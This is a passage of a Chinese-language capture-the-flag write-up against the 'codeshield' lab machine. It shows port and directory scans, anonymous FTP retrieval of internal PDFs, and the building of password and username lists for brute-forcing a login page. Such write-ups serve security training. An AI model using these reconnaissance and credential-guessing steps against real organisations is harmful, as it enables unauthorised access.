| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj
| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3/MwRFVlV1yx2+j4A/1TPZMB8G
| A1UdIwQYMBaAFCv1rp3/MwRFVlV1yx2+j4A/1TPZMA8GA1UdEwEB/wQFMAMBAf8w
| DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM
| 3TRrK4MtlnnchHwofu6qK7E2qIAM/E/yheSh9N/DKke8U3nAPYlcMVEtnygjS7fa
| KLGvj2LNhNj+z8EjNZDA/iQaz254EWrKw9hO6Tt//c3qEiI6PrnvK3Soj9btcSne
| oiXvnRvb49V4MBD/1gjHg1nIhjlgxcjVBXSbl/z2xBYHS58fwttmHkRIBxErVJdN
| Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U
| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R/+rlXrRJYWHKisujn+BCj
| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR
| oslJyh/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope
| iVfG8NlOKXtTDcBOLkOVD/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK
| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc/15wYXlYarGgMH
| sMDzpOY+uhmsu6CKsLufZaG4N8/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS
| 1ZUy
|_-----END CERTIFICATE-----
|_smtp-commands: mail.codeshield.hmv, PIPELINING, SIZE 15728640, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
|_ssl-date: TLS randomness does not represent time
993/tcp   open  imaps?        syn-ack
| ssl-cert: Subject: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN/localityName=ShenZhen/emailAddress=root@mail.codeshield.hmv/organizationalUnitName=IT
| Issuer: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN/localityName=ShenZhen/emailAddress=root@mail.codeshield.hmv/organizationalUnitName=IT
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-26T09:34:43
| Not valid after:  2033-08-23T09:34:43
| MD5:   04aa:3069:8114:4330:b40e:52bc:e802:f76c
| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88
| -----BEGIN CERTIFICATE-----
| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL
| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM
| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL
| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ
| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz
| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx
| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12
| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG
| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG
| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG
| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v
| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI
| 9G21uKbaLLVI/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc
| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c
| mQCns4N/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ
| xkbQDIEmSmaeoMD/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be
| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO/5
| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r
| 08WF/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S/+mCYuFfg5lx3ECV1piiW7
| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj
| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3/MwRFVlV1yx2+j4A/1TPZMB8G
| A1UdIwQYMBaAFCv1rp3/MwRFVlV1yx2+j4A/1TPZMA8GA1UdEwEB/wQFMAMBAf8w
| DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM
| 3TRrK4MtlnnchHwofu6qK7E2qIAM/E/yheSh9N/DKke8U3nAPYlcMVEtnygjS7fa
| KLGvj2LNhNj+z8EjNZDA/iQaz254EWrKw9hO6Tt//c3qEiI6PrnvK3Soj9btcSne
| oiXvnRvb49V4MBD/1gjHg1nIhjlgxcjVBXSbl/z2xBYHS58fwttmHkRIBxErVJdN
| Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U
| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R/+rlXrRJYWHKisujn+BCj
| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR
| oslJyh/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope
| iVfG8NlOKXtTDcBOLkOVD/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK
| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc/15wYXlYarGgMH
| sMDzpOY+uhmsu6CKsLufZaG4N8/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS
| 1ZUy
|_-----END CERTIFICATE-----
|_imap-capabilities: IDLE SASL-IR more have ID post-login listed AUTH=PLAIN ENABLE capabilities IMAP4rev1 Pre-login OK AUTH=LOGINA0001 LITERAL+ LOGIN-REFERRALS
|_ssl-date: TLS randomness does not represent time
995/tcp   open  pop3s?        syn-ack
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN/localityName=ShenZhen/emailAddress=root@mail.codeshield.hmv/organizationalUnitName=IT
| Issuer: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN/localityName=ShenZhen/emailAddress=root@mail.codeshield.hmv/organizationalUnitName=IT
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-26T09:34:43
| Not valid after:  2033-08-23T09:34:43
| MD5:   04aa:3069:8114:4330:b40e:52bc:e802:f76c
| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88
| -----BEGIN CERTIFICATE-----
| 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
| 1ZUy
|_-----END CERTIFICATE-----
|_pop3-capabilities: TOP UIDL SASL(PLAIN LOGIN) USER RESP-CODES CAPA AUTH-RESP-CODE PIPELINING
2222/tcp  open  ssh           syn-ack OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 32:14:67:32:02:7a:b6:e4:7f:a7:22:0b:02:fd:ee:07 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuHgUlIwWnDaiir2GGz0SZ364+nUeN06MhKR1Ahpj0qttOmTUXB45W9LOLALPxvRIWFsE7b04T5MK4kCvM4VwKai+n6ON4kEkAqImw8UDpviFSLn5+A19IkBkiDPUtm2G/DD+NTXj2w1TD2Pr1Wi6zY6tN3klkf6bkcszQ863BrGe5WHQhnNotc8+O5U8Fl01Fu46Pd6arpCpvaXgBL7h9eOcIHaTqComgbeDcrqmSiGM1RRzhh/er1WtfClT0bFjSCaDe5NpE0Oat92xzFuQ62c3Z5hqDfYLh6mkFGH062Lc4xkGS84q2GByWzvKgxXtAGDURdxGkpo0H9FAmuaKb
|   256 34:e4:d0:5d:bd:bc:9e:3f:4c:f9:1e:7d:3c:60:ce:6e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKw9aldAVwBR4fxzLD1Dqr4iBFV11fNBaZ+8pX4f1HDbPEscd2BkHMsYxR17e0zpSttM6DSfKT+YbLu2lDHWHmg=
|   256 ef:3c:ff:f9:9a:a3:aa:7d:5a:82:73:b9:8c:b8:97:04 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPXrs+Ma5M6viFKpjdt5NluM7u7W2jtKcyf4oe2UtFM+
3389/tcp  open  ms-wbt-server syn-ack xrdp
22222/tcp open  ssh           syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 2a:49:28:84:25:99:62:e8:29:68:88:d6:36:be:8e:d6 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMgmhyYVdTpcZBiKVuLSA2gn7UAxrhbSO7ycTn7usJq/3mcYdGYZacNcCv8qraxBcrdp2zITdCxstX2Fhy/EG5Q=
|   256 20:9f:5b:3f:52:eb:a9:60:27:39:3b:e7:d8:17:8d:70 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJdUVPSunKWnNtVeXr0fSi7Nvs2f/J7wQpoTfOEZVpcT
Service Info: Hosts: -mail.codeshield.hmv,  mail.codeshield.hmv; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52

┌──(kali💀kali)-[~/temp/codeshield]
└─$ sudo gobuster dir -u https://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404 
[sudo] password for kali: 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.0.2.22
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   301,401,403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================

Error: error on running gobuster: unable to connect to https://10.0.2.22/: Get "https://10.0.2.22/": tls: failed to verify certificate: x509: cannot validate certificate for 10.0.2.22 because it doesn't contain any IP SANs

┌──(kali💀kali)-[~/temp/codeshield]
└─$ sudo gobuster dir -u https://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404 -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.0.2.22
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   401,403,404,301
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 60375]
/contact.html         (Status: 200) [Size: 19386]
/about.html           (Status: 200) [Size: 27169]
/blog.html            (Status: 200) [Size: 37661]
/detail.html          (Status: 200) [Size: 36406]
/service.html         (Status: 200) [Size: 23979]
/feature.html         (Status: 200) [Size: 18200]
/team.html            (Status: 200) [Size: 23225]
/quote.html           (Status: 200) [Size: 18554]
/price.html           (Status: 200) [Size: 23856]
/robots.txt           (Status: 200) [Size: 26]
/LICENSE.txt          (Status: 200) [Size: 1422]
/testimonial.html     (Status: 200) [Size: 18531]
Progress: 139602 / 882244 (15.82%)

第一次报错是因为服务器使用的 TLS 证书未包含目标 IP 地址(如 10.0.2.22)作为 SAN,导致客户端无法验证证书有效性,在 Gobuster 命令中添加 -k--no-tls-validation 参数,跳过 TLS 证书验证。

但是太慢了,且没发现啥东西,就换了一个再扫一下:

1
2
3
4

┌──(kali💀kali)-[~/temp/codeshield]
└─$ curl -k https://$IP/robots.txt
User-agent: *
Disallow: /

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

┌──(kali💀kali)-[~/temp/codeshield]
└─$ sudo dirsearch -u https://$IP 

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/temp/codeshield/reports/https_10.0.2.22/_25-05-29_23-55-44.txt

Target: https://10.0.2.22/

[23:55:44] Starting: 
[23:55:45] 301 -  162B  - /js  ->  https://10.0.2.22/js/
[23:55:45] 403 -  548B  - /%2e%2e;/test
[23:55:57] 301 -  162B  - /.well-known/caldav  ->  https://10.0.2.22/SOGo/dav
[23:55:57] 301 -  162B  - /.well-known/carddav  ->  https://10.0.2.22/SOGo/dav
[23:56:03] 200 -   27KB - /about.html
[23:56:09] 403 -  548B  - /admin/.config
[23:56:24] 403 -  548B  - /admpar/.ftppass
[23:56:24] 403 -  548B  - /admrev/.ftppass
[23:56:32] 403 -  548B  - /bitrix/.settings
[23:56:32] 403 -  548B  - /bitrix/.settings.php
[23:56:32] 403 -  548B  - /bitrix/.settings.php.bak
[23:56:32] 403 -  548B  - /bitrix/.settings.bak
[23:56:40] 200 -   19KB - /contact.html
[23:56:42] 301 -  162B  - /css  ->  https://10.0.2.22/css/
[23:56:51] 403 -  548B  - /ext/.deps
[23:56:51] 200 -   34KB - /favicon.ico
[23:56:59] 301 -  162B  - /img  ->  https://10.0.2.22/img/
[23:57:03] 200 -    5KB - /iredadmin
[23:57:03] 403 -  548B  - /js/
[23:57:05] 403 -  548B  - /lib/
[23:57:05] 403 -  548B  - /lib/flex/uploader/.settings
[23:57:05] 403 -  548B  - /lib/flex/uploader/.flexProperties
[23:57:05] 301 -  162B  - /lib  ->  https://10.0.2.22/lib/
[23:57:05] 403 -  548B  - /lib/flex/varien/.actionScriptProperties
[23:57:05] 403 -  548B  - /lib/flex/varien/.project
[23:57:05] 403 -  548B  - /lib/flex/varien/.flexLibProperties
[23:57:05] 403 -  548B  - /lib/flex/uploader/.actionScriptProperties
[23:57:05] 403 -  548B  - /lib/flex/varien/.settings
[23:57:05] 403 -  548B  - /lib/flex/uploader/.project
[23:57:06] 200 -    1KB - /LICENSE.txt
[23:57:09] 200 -    5KB - /mail/
[23:57:09] 301 -  162B  - /mail  ->  https://10.0.2.22/mail/
[23:57:09] 403 -  548B  - /mailer/.env
[23:57:13] 502 -  552B  - /Microsoft-Server-ActiveSync/
[23:57:16] 401 -  574B  - /netdata/
[23:57:17] 303 -    0B  - /newsletter/  ->  https://10.0.2.22/iredadmin/newsletter
[23:57:32] 403 -  548B  - /resources/sass/.sass-cache/
[23:57:32] 403 -  548B  - /resources/.arch-internal-preview.css
[23:57:32] 200 -   26B  - /robots.txt
[23:57:42] 403 -  548B  - /status?full=true
[23:57:42] 403 -  548B  - /status
[23:57:49] 403 -  548B  - /twitter/.env

Task Completed

漏洞发现

ftp服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

┌──(kali💀kali)-[~/temp/codeshield]
└─$ ftp $IP                                                                                                                                                             
Connected to 10.0.2.22.
220 (vsFTPd 3.0.5)
Name (10.0.2.22:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||51498|)
150 Here comes the directory listing.
-rw-rw-r--    1 1002     1002      2349914 Aug 30  2023 CodeShield_pitch_deck.pdf
-rw-rw-r--    1 1003     1003        67520 Aug 28  2023 Information_Security_Policy.pdf
-rw-rw-r--    1 1004     1004       226435 Aug 28  2023 The_2023_weak_password_report.pdf
226 Directory send OK.
ftp> mget *
mget CodeShield_pitch_deck.pdf [anpqy?]? 
229 Entering Extended Passive Mode (|||57895|)
150 Opening BINARY mode data connection for CodeShield_pitch_deck.pdf (2349914 bytes).
100% |************************************************************************************************************************************************|  2294 KiB    4.37 MiB/s    00:00 ETA
226 Transfer complete.
2349914 bytes received in 00:00 (4.35 MiB/s)
mget Information_Security_Policy.pdf [anpqy?]? 
229 Entering Extended Passive Mode (|||56628|)
150 Opening BINARY mode data connection for Information_Security_Policy.pdf (67520 bytes).
100% |************************************************************************************************************************************************| 67520      672.40 KiB/s    00:00 ETA
226 Transfer complete.
67520 bytes received in 00:00 (658.94 KiB/s)
mget The_2023_weak_password_report.pdf [anpqy?]? 
229 Entering Extended Passive Mode (|||64848|)
150 Opening BINARY mode data connection for The_2023_weak_password_report.pdf (226435 bytes).
100% |************************************************************************************************************************************************|   221 KiB    2.46 MiB/s    00:00 ETA
226 Transfer complete.
226435 bytes received in 00:00 (2.40 MiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||24645|)
150 Here comes the directory listing.
-rw-rw-r--    1 1002     1002      2349914 Aug 30  2023 CodeShield_pitch_deck.pdf
-rw-rw-r--    1 1003     1003        67520 Aug 28  2023 Information_Security_Policy.pdf
-rw-rw-r--    1 1004     1004       226435 Aug 28  2023 The_2023_weak_password_report.pdf
226 Directory send OK.
ftp> exit
221 Goodbye.

前面信息搜集到的几个pdf文件全都下载下来了,看一下有些啥:

  • CodeShield_pitch_deck.pdf是一个ppt

  • Information_Security_Policy.pdf是信息安全政策

  • 2023 The_2023_weak_password_report.pdf是一份弱密码报告

发现了一些有可能利用到的信息:

image-20250530100300186

发现了Jessica Carlson以及相关信息:

image-20250530100359795

存在域名解析,可以加一下:

1
2
3
4
5
6

┌──(kali💀kali)-[~/temp/codeshield]
└─$ sudo vim /etc/hosts

┌──(kali💀kali)-[~/temp/codeshield]
└─$ cat /etc/hosts | grep hmv                                                               
10.0.2.22       codeshield.hmv

image-20250530101708792

添加一下到密码中,说不定后面需要爆破啥的:

1
2
3
4
5
6
7
8
9
10
11
12

┌──(kali💀kali)-[~/temp/codeshield]
└─$ cat pass                             
Xxxxxxxxx001
Password123!
Greatplace2work!
Diciembre@2017
Hairdresser1!
1qa2ws3ed4rf
XXXX12345678
Hairdresser1
Xxxxxxxxx002
Xxxxxxxxxx01

web探测

发现靶机开启了80443端口,显然是有web服务的,打开发现几处名单:

image-20250530104335540

image-20250530104703775

把名单记录一下:

1
2
3
4
5
6
7
8
9
10

Jessica Carlson
Mohammed Mansour
Xian Tan
Annabella Cocci
Thomas Mitchell
Patrick Early
Bob Watson
Jennifer Cruise
John Doe
Angelina Johnson

以及评论里提到了一个人Kevin Vaidez

但是根据经验,一般都是姓或名作为账号,试一下;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107

┌──(kali💀kali)-[~/temp/codeshield]
└─$ awk '{for(i=1;i<=NF;i++) print $i}' user >> user

┌──(kali💀kali)-[~/temp/codeshield]
└─$ cat user | grep -v '^$'
Jessica Carlson
Mohammed Mansour
Xian Tan
Annabella Cocci
Thomas Mitchell
Patrick Early
Bob Watson
Jennifer Cruise
John Doe
Angelina Johnson
Jessica
Carlson
Mohammed
Mansour
Xian
Tan
Annabella
Cocci
Thomas
Mitchell
Patrick
Early
Bob
Watson
Jennifer
Cruise
John
Doe
Angelina
Johnson

┌──(kali💀kali)-[~/temp/codeshield]
└─$ cat user | tr 'A-Z' 'a-z' >> user

┌──(kali💀kali)-[~/temp/codeshield]
└─$ cat user                         
Jessica Carlson
Mohammed Mansour
Xian Tan
Annabella Cocci
Thomas Mitchell
Patrick Early
Bob Watson
Jennifer Cruise
John Doe
Angelina Johnson
Kevin Vaidez
Jessica
Carlson
Mohammed
Mansour
Xian
Tan
Annabella
Cocci
Thomas
Mitchell
Patrick
Early
Bob
Watson
Jennifer
Cruise
John
Doe
Angelina
Johnson
Kevin
Vaidez
jessica carlson
mohammed mansour
xian tan
annabella cocci
thomas mitchell
patrick early
bob watson
jennifer cruise
john doe
angelina johnson
kevin vaidez
jessica
carlson
mohammed
mansour
xian
tan
annabella
cocci
thomas
mitchell
patrick
early
bob
watson
jennifer
cruise
john
doe
angelina
johnson
kevin
vaidez

还发现了一个敏感目录:

image-20250530135120877

存在一个登录界面。

爆破

尝试爆破一下,但是未果,看了别的师傅的wp,发现是使用了一个工具生成用户名,额,这一点的思路来源可能是因为前面的那个邮箱的用户名有些奇怪想到的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83

┌──(kali💀kali)-[~/temp/codeshield]
└─$ git clone https://github.com/w0Tx/generate-ad-username.git
Cloning into 'generate-ad-username'...
remote: Enumerating objects: 14, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 14 (delta 3), reused 3 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (14/14), 4.44 KiB | 758.00 KiB/s, done.
Resolving deltas: 100% (3/3), done.

┌──(kali💀kali)-[~/temp/codeshield]
└─$ cd generate-ad-username

┌──(kali💀kali)-[~/temp/codeshield/generate-ad-username]
└─$ ls -la
total 24
drwxr-xr-x 3 kali kali 4096 May 30 01:40 .
drwxr-xr-x 4 kali kali 4096 May 30 01:40 ..
-rw-r--r-- 1 kali kali 1974 May 30 01:40 ADGenerator.py
drwxr-xr-x 8 kali kali 4096 May 30 01:40 .git
-rw-r--r-- 1 kali kali 1030 May 30 01:40 README.md
-rw-r--r-- 1 kali kali   75 May 30 01:40 test.txt

┌──(kali💀kali)-[~/temp/codeshield/generate-ad-username]
└─$ cat README.md          
# Why ?

This script has been made for quick creation of usernames to use against AD when you only have the names and surnames for OSCP, Labs... 

It's not perfect, feel free to modify it.

Naming convention can be found there : [https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/index.html#recon-active-directory-no-credssessions](https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/index.html#recon-active-directory-no-credssessions)

```
NameSurname
Name.Surname
NamSur (3letters of each)
Nam.Sur
NSurname
N.Surname
SurnameName
Surname.Name
SurnameN
Surname.N
```

# How ?

Input names should be seperated by ','.

```
test,test2
test3,test4
```

Then : `python3 ADGenerator.py names.txt`

Example of output : 

```
metodijelizabeta
metodij-elizabeta
metodij.elizabeta
meteli
met-eli
met.eli
melizabeta
m-elizabeta
m.elizabeta
elizabetametodij
elizabeta-metodij
elizabeta.metodij
elimet
eli-met
eli.met
emetodij
e-metodij
e.metodij
elizabetam
elizabeta-m
elizabeta.m
```

这样的话,就要用回最原始的那个user了:

1
2
3
4
5
6
7
8
9
10
11

Jessica Carlson
Mohammed Mansour
Xian Tan
Annabella Cocci
Thomas Mitchell
Patrick Early
Bob Watson
Jennifer Cruise
John Doe
Angelina Johnson
Kevin Vaidez

再修改一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

┌──(kali💀kali)-[~/temp/codeshield/generate-ad-username]
└─$ cat new_user | tr ' ' ',' > user

┌──(kali💀kali)-[~/temp/codeshield/generate-ad-username]
└─$ cat user                        
Jessica,Carlson
Mohammed,Mansour
Xian,Tan
Annabella,Cocci
Thomas,Mitchell
Patrick,Early
Bob,Watson
Jennifer,Cruise
John,Doe
